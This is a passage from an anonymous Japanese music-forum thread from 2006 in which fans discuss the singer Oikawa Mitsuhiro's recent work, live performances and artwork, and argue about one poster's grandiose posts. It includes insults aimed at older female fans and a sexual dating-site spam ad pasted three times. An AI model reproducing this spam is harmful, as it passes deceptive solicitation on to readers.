その中には自滅の意味合いも孕んでいる。
さあ。これからどうする?

483 :NO MUSIC NO NAME:2006/09/08(金) 23:38:01 ID:1iHbab7x
ごめん…ちょっと疲れてきたかも。
ちょっとだけね。
寝れば直ると思うから。

484 :NO MUSIC NO NAME:2006/09/09(土) 00:55:39 ID:97n5YL70
ただいまんもす〜

>>481
確かにこの10年間、目を離すことなく及川光博と伴走しては来たと思うよ。
が、決してそれは、啓蒙されて盲いた狂信者の恍惚とした歩みではなかった。
ましてや“同情”などは。(sympathy?を指している?のなら、
共鳴か同調、共振?のようなものであれば、ある意味では無かった/無いとは
いえないけれど)

誤解を畏れつつも言うなら、
ある限られた意味においては、
彼は我々の信頼を裏切る不誠実な男だったよ。この10年間。
裏切られる事が楽しい、なんて斜に構えた戯言を
言って居られる余裕なんてない程に。
そういう意味では、決して彼は我々のBig Brotherで在ったことは無いんだよ。。。

けれども、曇った眼差しでステージ上のアーティストを観るなどと
時間と金と人生を無駄にするようなことはしたくなかったので、
紆余曲折ありつつ、艱難辛苦を乗り越えつつ・・・
ここ数年の間でやっと、自分達と彼との間に在するモノを俯瞰で観て、
甘受できるようになってきた、という感じかな。
さらば、愛しき反抗の日々、ってやつ。
(…周波数を君に合わせてみようか? もとよりここは、Channel Twoだ,
さしずめ I may pick YOU up on channel Two!ってところか...)

485 :NO MUSIC NO NAME:2006/09/09(土) 00:57:07 ID:NdP/59dx
長文(´Α`)ウゼーヨ

486 :NO MUSIC NO NAME:2006/09/09(土) 01:18:46 ID:88WNSaMu
みちーが心から好きだし、どんどん進化しているのをリアルタイムで見ていられるのは幸せだよ
でも単純に作品の話をさせてもらえば、100%手放しで褒めることはできないかな
特に最近の作品、イマイチぬるいものが多くて
作品に託されたメッセージはちゃんと受け取ってるし、
共感するけど・・・シャープさに欠けるというか
エッジが効いてないっていうの?切れ味よろしくないものが多い
話す言葉は相変わらず独創性に溢れているのになぁ
だから新作早く聴きたいとは思うけど、
この辺で、一度デビュー前の初心に立ち返ってがっつり歌作りしてみてほしい
うっとりならうっとりを、ファンクならファンクを、
練って練って練りまくって凝りまくって本人が「大傑作ができた!」と
臆面もなく言えちゃうようなそんな作品を作りあげてみてほしいよ

みんなと同じクオリティ、方向性で話できなくて申し訳ない
こういう意見もあるということで流してもらえれば


487 :NO MUSIC NO NAME:2006/09/09(土) 02:34:50 ID:WBDun91W
>>484
なんか凄いよく解るなぁ、その感覚w
私の周りのミチ友も同じような事を言ってた時期があったし、
私自身もミチーの事を「不誠実」だと感じて凄く嫌悪してた時もあった。
アーティストとしての及川光博さえ裏切ってしまうような
ミチー自身の不誠実さが色濃く出てた時期があったからねぇ。
その時の私は多分誰よりも頑にミチーを否定(つか拒絶かも)してて
かなりタチの悪いミチーアンチだった筈w

でもやっぱり、それで彼のアートそのものまで否定・拒絶は出来なかったよ。
いくらミチー自体に真剣に失望したとしても、ミチーが産み出すアートには
何の罪も汚点も無い訳だからね。
表現者の血肉と魂の結晶であるアートそのものまで全否定しちゃったら、
それは表現者(ここではミチーね)そのものを歪んだ刃で殺めてしまうのと同義になっちゃう。
それはやっぱり、「受け手」としては絶対的な禁忌だろうと。

そう考えたら、自分がここまでミチーファンで居られたのは
ミチーそのものよりむしろミチーの産むアートありきだったと思う訳です。
ずっとミチーそのものに同情もしくはマンセーしてたとしたら
きっととっくの昔にファン辞めてたよw

488 :NO MUSIC NO NAME:2006/09/09(土) 02:52:17 ID:mE8Ih2uj
及川光博は、絵は描かぬのか。スレ違だが。

詳しく言えば、先ほど「博」まで完聴きした。

で、思ったのは。この人死ぬのかなと思った。
または、歌止めるのかなとか。一度自分を殺して。
新たに踏み出す何かは欲しいところだが。
創造性は・・・・・

>>484 同情とは御幣があるそれはsympathy。意識の旅。

489 :NO MUSIC NO NAME:2006/09/09(土) 02:53:53 ID:WBDun91W
>>486
別に作品を褒めることは無いと思うよ。
受け手は批評家では無いし、純粋に「好きか嫌いか」でいいと思う。
「今のミチーの音楽はいまいち好みじゃないなー」って思うことは私にもよくあるしw

今は確かに手法が穏やかな感じだと私も思うけど、
まあそれも成長かなって思ったり。
あらゆる物事・事象を昔より広く捉えられるようになったんだろうと。
ミチー自身それを解ってるだろうから、今はそれをストレートに表現したい時期なんじゃないかね。
この10年で、ミチーのそういう物事の捉え方も随分深さと奥行きが出てきた感じだから
またこの先には、その広い観点から浮かび上がってくるミニマムな世界観みたいなものを
それこそ昔よりずっと凝って作りたくなる時が来るかもしれないよ。

490 :NO MUSIC NO NAME:2006/09/09(土) 02:54:42 ID:mE8Ih2uj
アートフリーカーである私個人の切望として、
スタチュでもトルソでも、モニュメントでも、オブジェでも。
あるいはペイントでもいいから。
何か、アクトの一環として、何か形にして欲しいと思う。

491 :NO MUSIC NO NAME:2006/09/09(土) 03:02:07 ID:mE8Ih2uj
>>486さん >>489さn
こうして全部聴いて見ると、確かに最近の音楽には、
切れるナイフのような危うさと角がなかった。
惰性で作っている感じ。
これが、この先。
癒し系のものに変わる危険性はないか?
そうなったが最後、ある種の宗教に近いsympathyを求められる。
そんなのはごめんだ。
齢がそうさせるのか、音楽生活の年月がそうさせるのか、
そうやって流れたアーティストは、この国に沢山いて。
ダメになっていく、そして、はいさよなら。ってことになるのか。
言っておくが私個人の感想だ。

これまでどおり、及川光博には、刺激を求めたい。

492 :NO MUSIC NO NAME:2006/09/09(土) 03:30:42 ID:WBDun91W
>>488
絵、描きますよー。結構お上手だったりします。

>この人死ぬのかなと思った。
または、歌止めるのかなとか。一度自分を殺して。
新たに踏み出す何かは欲しいところだが。

そこについては以前ステージで、ある意味とても逆説的手法として体現した事があります。
一人のアーティストたる若者が自ら命を絶つ(が、一命とりとめ後に復活)という内容の劇中劇を。
彼は、アートの不死の重さと、それを抱えるアーティストの苦悩(心の闇になるのかな)に
至極真摯に対面しているアーティストであって、
その、アーティストたる己が抱える悲壮な心の闇の昇華は
決して死によってもたらされるものでは無いんだという事を
その劇中劇で見事に表現していた。

ただ、ミチー本人の言葉で「及川光博は毎日死んで、毎日新しい及川光博が産まれているんだ」
という発言が過去にあったので、それを踏まえると
日々高みに上昇するためには、常に己の現状を自ら淘汰して
アートに向き合わなければいけないんだという意志は強く感じる。

493 :NO MUSIC NO NAME:2006/09/09(土) 03:35:28 ID:mE8Ih2uj
big brother
愛しき反抗
それはかつて一世を風靡したあの「暴 力的な 威 厳」を持つ
デューク。ハロウィン・ジャックの事か。
及川光博はシャツに細身のパンツといういでたちが多いのだが。
ここいらあたりで一つ。
カンサイさんに衣装を任せてみないか?及川光博よ?
ダイアモンドの犬になれ。
keep cool 

494 :NO MUSIC NO NAME:2006/09/09(土) 03:41:37 ID:mE8Ih2uj
>>492さn
そうですか。7回死んで7回生まれる。
そのつど脳のシナプスは新たにつながり組み込まれ、
アレンジメントはその日のために用意される。
おかきが好きな人がいて、毎日おかきが美味しいのは。
死んで生まれるからだと、ある、ギタリストが言ってた。
及川光博の場合。
おかきだと、雰囲気がコワレるなしかし。
でも、そういった意味で、7回死んで7回生まれるやり方は、
メロウな感性を生み出す自己暗示および。創造性の豊かさに広がりを持つ。

その画。見たかった。
あの手で描かれる絵はどんなだろう。


495 :NO MUSIC NO NAME:2006/09/09(土) 04:05:25 ID:WBDun91W
うぉー眠くなってきた・・・

>>491さん
そこについては私もまたちょっと思うところがあるのですが
今日はもう頭がまわんないので、また近いうちに意見させて下さい。


なんか久々にちゃんとミチーの事考えたなw
おやすみちー。

496 :NO MUSIC NO NAME:2006/09/09(土) 04:54:48 ID:DW7eApcf
確かに今の楽曲は(嫌いじゃないけど)緩いし温いし個人的には昔の曲のが好きだけど、それでも現在のミッチーのファンを続けられるのは昔の尖った楽曲もライブで完璧に歌いこなすからだと思ったり。

497 :NO MUSIC NO NAME:2006/09/09(土) 14:16:16 ID:97n5YL70
>>493 >「暴 力的な 威 厳」
あははw じーっとPC画面を睨みつけてブランクの意味を暫く考えこんでた。ニブくて失敬。

寛斎は、今はあまり服飾の方は力を入れていない?という噂を聞いた。
一時ミチーとコラボしていた某H氏の奇抜で装飾過多なコスチューム、
私的には、どうにもテイストではなかったので、(その線狙うなら)
カンサイ!カンサイ!!と、当時自分がしきりに雄叫びを挙げてたことを思い出した。
伯林での2作目にあたる名盤―― あの、凄まじく美しいジャケ写等々を撮影した、
某日本人敏腕写真家とのフォト・セッション、そろそろやってもいい頃だと思ってる。
どうしてかなかなか機会に恵まれないようだけれど。

ミチーも絵はかなり達者なようです。
が、油彩等の本格的絵画作品は見たことが無いな。
玄人風な漫画タッチのイラストが披露されるのをかつて何度も見たし、
コマを割った動きのある場面も巧みに描けるようで、似顔絵もそこそこ似てる。
毎日忙しくてイラストは描く余裕が無い…と話すのを読んだのは、何年前のことだろう。

いずれにせよ、今のところ、歌(と演技)以外の芸術を
もうひとつの創造の扉として展開する兆しは見えないように思われます。
ミュージシャンが、絵画・造型・デザイン等の活動によって
クリエイティヴィティーの枠を広げたり、本領である音楽の場を健全に保つ為の
別ベクトルでの意思発散のツールとしてそれを活用するのは良くある事だけれど、
彼の場合は、そういうバランスを、現状、歌(音楽活動)と演技の仕事との間で、
非常に上手く保っているように見える。
そのふたつが巧い具合に影響し合い、総合的な表現力を高める糧と成り得ているような。
つまり、演技をするように歌える歌い手であり、
演技には、音楽の抑揚が添えられているかのような。
まあ、私的な所感ではあるのだけれども。

余談: ↓ごく最近公式発表されたニュース。
ttp://www.din.or.jp/~kn-film/clone/index.html
このシノプシス。凄過ぎると思いませんか・・・  ...I'm happy, hope he's happy, too....

498 :NO MUSIC NO NAME:2006/09/09(土) 16:02:41 ID:97n5YL70
>>492
いかにも。あの時彼は、ロックンロールの自殺者を
(自己流のセオリーとメソッドに於いてだが)確かに体現していた。
しかしそれはとても too unfair なものに、当時は見えた。
あの自殺未遂と復活(死と再生)のパフォーマンスは
全ての彼のオーディエンスの心に、歴史的に大きな傷痕を残したと思う。
その精神的外傷の余韻は、未だ我々の裡深くに巣喰っていて
後々邂逅する全ての音楽体験のなかにすら色濃く裏移りする、
崇高にして禍禍しい、最強の原体験となってしまったりもしているのだが、
それは我々の Another Face。また別の物語なので此処では割愛。

Solution―― あの復活劇のなかで歌われた2曲のうちのこの1曲が、
21世紀になって改めて歌われたことの意味は大きいと思う。
芸術の創造者としての自己存在が、生と死を繰り返すことの不可避性。
先の劇中劇が演じられた当時は、
葛藤と挫折、絶望の部分のみが浮き彫りになったような印象を
聴衆に齎す演奏だったわけだが(先述した演技の文脈に起因すると思われる)、
時間を経て、より強靭な表現者となった同じ歌い手の喉から出るその声は、
芸術による躓き・御し得ない世界への畏れを負の要因とすることなく、
更なる飛躍のための糧とし礎とし、凌駕するに足る雄大な力に満ち充ちていた。

>>496にも指摘されているが、
懐かしくも愛しいあの旧曲達が、
常に新しい力と意志を吹き込まれ、生まれ変わって
目の前に届けられ続けていることが、なんとも嬉しい。
全く新しい曲が何よりも大切なのは言うまでもないけれど、
歴史や記憶を伴うその旋律が、
更なる確信と希望、未来の伝説を運んでやってくる。
この幸福を手放すほど愚かになることは、私にはできない。
(そこには、共にこの歳月を Survive してきた者としての聴衆への
sympathyやregard、honestyも幾許か込められていると、
夢想することすら許されるような気がしている。)

499 :NO MUSIC NO NAME:2006/09/09(土) 16:31:46 ID:DHVJxd7t
もうちょっと一般的な…言い換えれば自分に酔っているように見えない文章が書けないものかな
えっとねぇ…大仰すぎるんだよ 
妙に横文字はさんでみたりさ
頭の良さそうな人だからそれくらいできるっしょ

内容と言葉のチョイスの不調和具合で背中がムズムズする

500 :NO MUSIC NO NAME:2006/09/09(土) 16:39:13 ID:PKM1G275
読んでて疲れる・・・・

501 :NO MUSIC NO NAME:2006/09/09(土) 16:41:44 ID:Wjsnb+Uj
愛しすぎちゃってるんだよ

そういう私もスキです。みちー


502 :NO MUSIC NO NAME:2006/09/09(土) 16:51:51 ID:DdRXAbYZ
内容と言葉の不調和…

一見客観性があるように見えて、実はこの上なく主観的である所か

503 :NO MUSIC NO NAME:2006/09/09(土) 16:52:40 ID:27BMvhjx
不調和とは思わないよ
ちょうどこれくらいなんじゃない?釣り合い具合∠内容と言葉。

確に読み疲れはしたww

504 :NO MUSIC NO NAME:2006/09/09(土) 17:15:30 ID:5to9YiKA
ごめん、ポイントしか読んでないんだけどw

>みちーは絵が上手い

って意外! 字を見て、手先は不器用な人だと思い込んでたわ(スマン)。
今までにイラストとか、発表したことってあったのかな?

505 :NO MUSIC NO NAME:2006/09/09(土) 17:19:03 ID:WBDun91W
まあ時にはこういうモードもいいでないかい?
ジブンは凡人だから平坦な語彙でしか参加できてないけど
顔も知らないどこかのミチファンとこうやってじっくり話す機会とかそうそうないから
単純かつ真面目に楽しませて貰ってるよ。

506 :NO MUSIC NO NAME:2006/09/09(土) 17:26:28 ID:WBDun91W
>>504
確かに字はうまくはないもんなw(かわいいから好きだけど)
初期のFC会報では四コママンガ描いたり、
あとディスクガレージのペーパーの表紙絵描いてた事もあった。
ミチーの自画像かわいいよw

507 :NO MUSIC NO NAME:2006/09/09(土) 17:42:00 ID:5to9YiKA
>>506
レスthx!みちーてば、マルチな才能があるんだね。
また描いて欲しいものだな、4コママンガw

508 :NO MUSIC NO NAME:2006/09/09(土) 20:22:52 ID:SvfjFWFI

いい年してファンやってる鬼女さまたち、我にかえってみな
みちーよりより年上の夢うつつな方達、信じられないわね


509 :NO MUSIC NO NAME:2006/09/09(土) 20:50:15 ID:88WNSaMu
みちーの絵は可愛いけど、ちょっとアニヲタっぽいよ
そりゃあんだけアニメ好きだと影響もされるよね
そんなところもらしいので自分は好きだけど
(自分描くときもキラン☆とか入ってるw)
でも、いわゆる「絵の上手い芸能人」とかいうレベルとはまた違うお話よ

DG表紙ってどんなイラスト描いてたっけ…人魚とかあったような?

510 :NO MUSIC NO NAME:2006/09/09(土) 21:41:48 ID:SvfjFWFI

ウザってー
化石ババア

511 :NO MUSIC NO NAME:2006/09/09(土) 22:04:02 ID:YZuPUUau
ハイハイ若くて綺麗で羨ましいわ。
あ、ゴメン「わかくてきれいでうらやましいわ」

バカだから長文読めなくてスネてるんでしょ?

512 :NO MUSIC NO NAME:2006/09/09(土) 22:28:00 ID:BMQBHOj0
ごめん>ALL。
私は飽きっぽいから、そのうち及川光博にも飽きると思うから。
それまで勘弁汁。

そして、ここにもロックンロール・スーサイズがいるようだな。
背中が疼く程の不愉快を感じさせて、ベイベというベイベを、敵に回して。
スーサイズするか。あるいは及川光博が先に。
心の淫らな。大量虐殺を行うか。
追いつめて追いつめて、あの人を追いつめてきりきり舞いさせて。
産みの苦しみと、奥なる自信の本当の姿とのジレンマを生じさせ。
新しいものを放り投げてもらう。
それが、望みだろう?

513 :NO MUSIC NO NAME:2006/09/09(土) 22:33:44 ID:27BMvhjx
>>512タソ
(*´Д`)待ってた〜



514 :NO MUSIC NO NAME:2006/09/09(土) 22:35:36 ID:BMQBHOj0
>>497さn
寛斎さんは、初期の頃、ロンドンマンだった頃によいものを沢山作っています。
ライヴ映像を見る限り、及川光博の衣装だけが彼のパフォーマンスには。
チグハグな気がしました。もう少し魅せる意味での衣装が宜しいかと。
途中で脱ぐ動作はとても魅力的なものだけど、あれだけでは足りない。
もうやってるとかさんざん言われそうだが、ボディペイントとか、
マイムの白塗りとか、面白そうだなと思います。

もっと肉体を鍛えるとか。三島みたいに。で、鏡を沢山ランダムに置いて、
写真を撮るの。

515 :NO MUSIC NO NAME:2006/09/09(土) 22:38:06 ID:BMQBHOj0
>>513さn
待たれても貴方ほどに及川光博を知らないんだよ?
新しい情報とか、あの人の魅力はあなたベイベ以上になんか分らないし。

劣化してくるのも時間の問題。
飽きるのも。

516 :NO MUSIC NO NAME:2006/09/09(土) 23:05:41 ID:88WNSaMu
見た目エキセントリックなことはみちー的に20代でやり尽くした感があるんじゃないかな
写真詩集「続・欲望図鑑」を最後くらいに

この「続〜」は世間的にはオールヌードだけが先行して騒がれちゃったけど詩がとてもいいよ
ちなみに裸で金色にペインティングしてる写真やモノクロのオールヌードなんかもあって
BMQBHOj0さんはけっこう好みかもしれないよ


517 :NO MUSIC NO NAME:2006/09/09(土) 23:14:01 ID:QtVkiRWY
無料で人妻とエッチする快感。

若い時よりも肉体が開発されていく
人妻の方が性欲が強いのは有名な話ですが、
その人妻が出会い系に登録している話は
あまり有名ではありません。

何故でしょう?

人妻が出会いを求めた時に、
・秘密が守れて
・時間に関係なく
・性欲だけを満たす事が出来る
便利な関係を作るのに出会い系が楽なんですね。

時間を持て余していると言っても、
常に時間がある訳ではなく、人によって
主婦をマジメにする方もいれば、
旦那が出張中以外は旦那を愛している方もいる訳です。

ただ、状況によっては、
時間と身体を持て余す最高のセフレ候補になるんですが…

最近の人妻は一昔前の主婦といったイメージではなく、
未だに若さと美しさを保っている方が多いです。

美乳セレブ ケイコさん

例えば若い娘のように口説く必要があまりありません。
会った時に食事してカラオケしたりとか、
無駄な時間とお金を使う必要がないです。

じゃセックスだけって淋しいのかと言うと…
それは実際に経験して頂いた方が早いかと。

今回のユキさんも3ヶ月前にここで知り合いました。


518 :NO MUSIC NO NAME:2006/09/09(土) 23:18:15 ID:BMQBHOj0
>>516さn
時遅哉・・・・・・・・・・・絶版していて何処にもない。
手垢のつかない新品が欲しい。どうせなら。
日本のアーティスト浦島はこれだから。話にならない。

あの後の話だが。何か及川光博が。
挙動不審というか、目が泳いでいるというか。
心ここにあらず的な感じに見えるのだが何があったのだろう。
微妙に顔だけ太ったというか。ホリが浅くなってる。なんでだろう。

519 :516:2006/09/09(土) 23:23:22 ID:88WNSaMu
・・・書いてからよーく思い出してみたら金色ペインティングなんかなかったねorz
現物は今ここにはないから確かめられないんだけど
でもそれくらい綺麗な写真が満載
>>518
絶版なんだ
ちょっと前までは大きな本屋にいくといまだに置いてたりしたんだけどな


邦楽スレなのにちょっとスレ違いな話題でした ってことで消えます
失礼しました〜



520 :NO MUSIC NO NAME:2006/09/10(日) 02:13:35 ID:d29Z3rl6
あら今日は静かだね。
>>512
どうせなら、すぐに飽きずにもっとミチーの世界観にダイビングしてみて下さい。
飽きちゃう前に、やっぱり是非ともライブを体験してみて頂きたい。

521 :NO MUSIC NO NAME:2006/09/10(日) 02:54:41 ID:xNq8c37N
ぉぅょ熱が冷めるまでもう少し待て。

絶版だあれ。


で、ベイベ達に問いたいのだが。
及川光博へのサーベジ・ジョウは、どこにあったんだ?
インディーズ時代から聴いてるのか。それともメジャーになってから
なのか。そして音楽から入ったか、ルックスやビジュアルから入ったのか。
はたまたドラマとかTVの露出からか?良かったら教えてくれるとありがたい。

私の場合。自分語りになると嫌われるのは承知で書くと。
当時、キューティの付録に「王子様シール」というオマケが付いていて。
いっぱい及川光博がポーズを取って、サンテグジュペリの挿絵みたいな服着てた。
特集か何かが組まれていたんだけど。それはスルーしながらも。
そのシールが面白かったので、ステレオの周りにグルリと貼った。
貼ってユーリズミクスやロクセットのCD。LD(懐かしいだろ で
マイヤ・プリセツカヤのラ・バヤデールなんかをみながら聴きながら。
それを見ていると、シールの及川光博が踊っているように見えた。
なななななーな、な、な、なーとか言いながらロクセットガンガンやったり。
マイヤ・プリセツカヤの時は、伸ばした腕が相手役の王子みたいに見えた。
この人はなんだろう。なんか。ふかわりょうあたりと微妙に被ってるとか
思いながら。大間違いなんだが当時はそう思った。
次の日シールははがされていて、兄が、変なシール貼るなと怒っていた。

で、今回。10周年とかで色々見てて。夢を見た。私の猫さんを及川光博が
返してくれなくて、困っていた。それで、PV見たらハマった。

10周年だ。
ベイベのミチー遍歴を語っても良いだろう。
この邦楽板で。



522 :NO MUSIC NO NAME:2006/09/10(日) 03:26:09 ID:xNq8c37N
さて。
こうして今手に入るメジャー黎明期からの及川光弘を
駆け足で聴いてみるとだ。
まるで嘔吐しながら満漢全席を腹いっぱい食らった感があるな。
いい感じにはじまって、フェードダウンしながら暗転して。
もう愛のメモリーあたりでヤメテーってなって。

こういうのはどうか。曲に行き詰るなら。
全曲カヴァーでってのは。しかもだ。
昭和の歌謡曲の巨匠 つのだ☆ひろ あたりにプロディースでコラボ。
つのだ☆ひろ密かに凄い。大御所だし。良いドラムビートを持ってる。
未だ色あせていないんだあの人も。
ヒップ・ポップ レゲエ ジャズ ブルー 「ムード歌謡」 
私は和田アキ子の「古い日記」あたりを、ファンクに聴かせて欲しい。
新進気鋭のとか中堅あたりでなくハデに大御所引っ張り出す。
及川光博。
孤高の人が。
誰かとしかも、え?みたいな感じの人とやるのは見てみたい。

って。行き詰ってなんかないんだろうけど。
そんなのありえないんだろうけど。意外性という事で。
今も構想で忙しいんだろうけど。チャyチャ入れてみる。怒られそうだw

523 :NO MUSIC NO NAME:2006/09/10(日) 03:42:15 ID:xNq8c37N
金閣寺の心理だ。最期は。あの遺物の最期は。
美しいものを壊したくなる。
最期は。あの遺物の最期は。
引き裂いてやろうか。
火あぶりの刑にしてやろうか。
今はブラック・サバスの間に挟んでおこう。

ベイベの及川光博への忠儀心はどこまでを誓ったもんなんだ?

それは最も美しきものであると同時に
しばしば最も疑わしきものであって
他の感情の仮面である

詭弁といえば詭弁だが。  鏡を持てみるごとく朧   なものかもしれないぞ。
自分が自分を一番理解していない事は多いからね。

義理といえばその翼の下にあらゆる偽善が隠されているものだ。
逃げ隠れしなくても良いだろう堂々としていたいものだ。
カンバスの外側にまで広がる世界を堪能するにはあと何ヶ月。いや
何年かかるか勝負だ。

524 :NO MUSIC NO NAME:2006/09/10(日) 07:18:12 ID:ucSq95ky
そろそろ気持ち悪いよ
文脈gdgdだし会話になってない

525 :NO MUSIC NO NAME:2006/09/10(日) 07:43:48 ID:9BoTyAav
誰も会話なんかしてないと思うが。

526 :NO MUSIC NO NAME:2006/09/10(日) 08:22:05 ID:F7YoEb2X
>>523
若い時よりも肉体が開発されていく
人妻の方が性欲が強いのは有名な話ですが、
その人妻が出会い系に登録している話は
あまり有名ではありません。

何故でしょう?

人妻が出会いを求めた時に、
・秘密が守れて
・時間に関係なく
・性欲だけを満たす事が出来る
便利な関係を作るのに出会い系が楽なんですね。

時間を持て余していると言っても、
常に時間がある訳ではなく、人によって
主婦をマジメにする方もいれば、
旦那が出張中以外は旦那を愛している方もいる訳です。

ただ、状況によっては、
時間と身体を持て余す最高のセフレ候補になるんですが…

最近の人妻は一昔前の主婦といったイメージではなく、
未だに若さと美しさを保っている方が多いです。

美乳セレブ ケイコさん

例えば若い娘のように口説く必要があまりありません。
会った時に食事してカラオケしたりとか、
無駄な時間とお金を使う必要がないです。

じゃセックスだけって淋しいのかと言うと…
それは実際に経験して頂いた方が早いかと。

今回のユキさんも3ヶ月前にここで知り合いました。

527 :NO MUSIC NO NAME:2006/09/10(日) 11:15:10 ID:8ojUVnmv
このスレ気持ち悪い

528 :NO MUSIC NO NAME:2006/09/10(日) 13:15:18 ID:d29Z3rl6
>>521
私の場合、
・元々関西アマチュアバンドのファン
   ↓
・そのバンドが出るアマバンコンテストでデビュー時のミチーがゲストミニライブ出演
   ↓
・その時のライブを観てミチーに見事KOされる
   ↓
・今に至る

という感じ。
ミチーとの出会いがライブという空間で本当に良かったと思ってます。

529 :NO MUSIC NO NAME:2006/09/10(日) 16:28:59 ID:56nQkoKO
>>524 我慢できなければヌルー汁。

530 :NO MUSIC NO NAME:2006/09/10(日) 17:38:14 ID:56nQkoKO
>>521
映画監督トッド・ヘインズ(Velvet Goldmine)が、
青春時代に、あのカレイドスコープの権現みたいな男に夢中になったのと
似たようなきっかけだったんじゃないかな。思い起こしてみると。
曖昧なセクシュアリティーが境界線上で揺らめいてる…みたいなところが
自分的には大ヒットというかドンピシャだった。
でも、次第に彼は変化し脱皮し成長し…その部分に拘ってるだけでは、
もう健全にはフォローしていけなくなってきた。
(その辺は、トッド・ヘインズの愛憎とシンクロする部分が多々あり)
だから、もう今はあまりそこには拘らないようにしてる。

今は、もう、純粋に歌が全て。
生のライブの空間さえあれば他には何も要らないって言っても過言じゃない。
ミチーが、生のライブを一番大事にしてくれる歌手で良かったと思う。(その辺 >>528と同感)

531 :NO MUSIC NO NAME:2006/09/10(日) 18:42:43 ID:mJ8ETp8+
>>521
>あの本、密林検索でusedなら割と安価でいっぱい出てるけど
美本新品となるとぼったくり値段になっちゃうようで残念。
>>522
全曲カバーアルバム「Gold Singer」つい最近出してます。
ムード歌謡も「東馬 健」名義で「星降る街角」や「アマン」渚ようことデュエットも。
大御所と組んだっていえば、清志郎とユニット(ミツキヨ)もやった。
いずれも、522さんの意図するとこと一致してるかどうかはわかんないけど…


532 :NO MUSIC NO NAME:2006/09/10(日) 19:26:13 ID:S6kL6bcb
NGに入れたいからコテハンつけて。
>xNq8c37N

533 :NO MUSIC NO NAME:2006/09/10(日) 19:29:04 ID:21rcFRuL
me to
>>523
コテハン希望

534 :NO MUSIC NO NAME:2006/09/10(日) 20:41:32 ID:oDkdbj2j
今までロムってた人たちも我慢の限界と見た

帝国とか行ったらどうだろう?>>523
ここよりも沢山の人が賛同してくれると思うよ
的を得てるなーと思うことも多いしさ


535 :NO MUSIC NO NAME:2006/09/10(日) 22:09:35 ID:56nQkoKO
本人ファンじゃないって断言してもいることだし、定刻展開はムリだろうね。
ココ、今までほとんどスレとしての機能果たしてなかったワケだし
これはこれで面白く回ってるから、放置でかまわないと思うけど。
延々永遠に続くわけでもないんだろうしね!
あっちみたいに時々荒れ放題になるのに比べたら全然マシじゃない?

536 :NO MUSIC NO NAME:2006/09/10(日) 22:27:08 ID:3MiSKEzi
内容はオモシロイと思う。>>475まではなんとか我慢できたけど
>>480以降の大仰な表現には辟易…。
ライヴ行ったら案外あっさり去ってしまわれるかもしれませんがね。

>>534
的は射(ry
これってふいんき(←何故かry)と同じ?

537 :NO MUSIC NO NAME:2006/09/10(日) 22:50:44 ID:mJ8ETp8+
純粋に楽しんでますが何か?
思うところは人それぞれでしょうけれども
面白く読んでるのもいますよノシ ってことで。


538 :NO MUSIC NO NAME:2006/09/10(日) 23:18:43 ID:d29Z3rl6
>>536


539 :NO MUSIC NO NAME:2006/09/10(日) 23:21:14 ID:d29Z3rl6
きゃー途中送信してもうたorz

>>536
一回ライブ行ったら案外あっさり・・・ってそれテラサミシスw

540 :NO MUSIC NO NAME:2006/09/11(月) 00:46:33 ID:UzkTG5UZ
今まで噂スレ142まで全てとここの12まで全て読み飛ばす事はなかったが
今回ばかりはここは飛ばし読み


541 :NO MUSIC NO NAME:2006/09/11(月) 10:10:21 ID:Rb0Ya2YR
面白く読んでる人と読んでない人の住み分けのために
コテハンをつけて欲しいのですよ。
出て行けといってるわけではないからね。

ま、昨日の夜中はなかったみたいだから
そのままかもしれないけど。

542 :NO MUSIC NO NAME:2006/09/11(月) 20:30:50 ID:7sl02yWe
この人女ったらしだから嫌い

543 :NO MUSIC NO NAME:2006/09/11(月) 21:07:24 ID:BUq7+qII
たらされたの?うらやましいww

544 :NO MUSIC NO NAME:2006/09/11(月) 22:51:43 ID:bTHKbbxT
読む読まないとか知った事ではないね。
そのためにコテなんか('A`) 見たくないなら見なければいい。
もし押し付けてくるように文字が迫ってくるなら。一種の強迫観念だから。
Drに相談するかあるいは。2ちゃんを止めることだね。これは基本的な
事だろう?帝国なる自分達の世界があるようだし。何もここでこんなイタイ文章を
煽る事はないだろう?それとも自分のままならない現実を逃避して人を意のままに?
まぁ。2ちゃんは私のものでもないけどな。
私は貴方が私を誤解して嫌っても。同じ歌を何度も何度も嫌になるほど聞かせて発狂

眉を顰めるそのベイベの表情を想像するのも一興だ。
見 て み な その恐い顔。

私は前から言っているように、及川光博に隷属するものではない。
ご機嫌取りでもなければ、信用できる人間でも、巧言麗色でもなんでもない。
自分から奴隷になる道に憧れるなんて、中2病のように不思議だ。
広げられた腕ならば喜んで転がり込んで。あのように異様な空間を
作っている。あくまでも私の容赦のない言い方と主観で言えば。
いたぶられているように見えてくる。
及川光博は。
そんな光景を見て。どんなにご満悦なんだろうな。
洗脳して跪かせて躍らせて歌わせてみんなみんなみんなこっち見てるんだ。
あの人はそのためだったら何でもするんだ。だから色々な小細工を仕込んでくるんだ。
そのためなら及川光博は喜んで寝る時間さえ削り馬車馬のように露出しては消え。作っては壊す。
あの笑い方も、話の仕方も、全部全部。サディスティックに見えるのは私だけか?


切り裂かれたのではない。傷はやがて瘡蓋を形成し、治癒する。
これは青痣。内側からベットリと張り付く血。

多分トオリスガリの>>542さんが言うように。女ったらしじゃ無いぞ。あのひと。
多分。女を逆にいたぶりたい人だろうと思った


545 :NO MUSIC NO NAME:2006/09/11(月) 22:56:12 ID:bTHKbbxT
私は私のXTCと、それによって得られるカタルシスを得る為に。
飽きるまで。
ただそれだけの話だ。
XTCググレカス

546 :NO MUSIC NO NAME:2006/09/11(月) 23:34:11 ID:A4x6fjKW
はいはい。

547 :NO MUSIC NO NAME:2006/09/12(火) 00:23:12 ID:iUu2wqDS
>>544
若い時よりも肉体が開発されていく
人妻の方が性欲が強いのは有名な話ですが、
その人妻が出会い系に登録している話は
あまり有名ではありません。

何故でしょう?

人妻が出会いを求めた時に、
・秘密が守れて
・時間に関係なく
・性欲だけを満たす事が出来る
便利な関係を作るのに出会い系が楽なんですね。

時間を持て余していると言っても、
常に時間がある訳ではなく、人によって
主婦をマジメにする方もいれば、
旦那が出張中以外は旦那を愛している方もいる訳です。

ただ、状況によっては、
時間と身体を持て余す最高のセフレ候補になるんですが…

最近の人妻は一昔前の主婦といったイメージではなく、
未だに若さと美しさを保っている方が多いです。

美乳セレブ ケイコさん

例えば若い娘のように口説く必要があまりありません。
会った時に食事してカラオケしたりとか、
無駄な時間とお金を使う必要がないです。

じゃセックスだけって淋しいのかと言うと…
それは実際に経験して頂いた方が早いかと。

今回のユキさんも3ヶ月前にここで知り合いました。

548 :NO MUSIC NO NAME:2006/09/12(火) 00:30:37 ID:0F2/kmKq
>>544
